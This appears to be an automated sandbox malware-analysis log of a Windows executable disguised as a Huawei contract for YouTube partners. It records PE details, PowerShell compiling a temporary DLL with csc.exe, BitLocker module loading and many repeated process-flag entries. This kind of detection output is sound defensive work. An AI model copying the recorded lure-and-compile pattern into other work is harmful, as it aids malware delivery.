Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256iEc source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"Jump to behavior
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: section name: .CLR_UEF
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: section name: .didat
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: section name: Section
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3444D2A5 pushad ; iretd 2_2_00007FFD3444D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345600BD pushad ; iretd 2_2_00007FFD345600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345300BD pushad ; iretd 4_2_00007FFD345300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34530108 push ds; retf 4_2_00007FFD345301B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3453018D push ds; retf 4_2_00007FFD345301B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34530347 push esi; retf 4_2_00007FFD34530376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34530327 pushad ; retf 4_2_00007FFD34530346
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
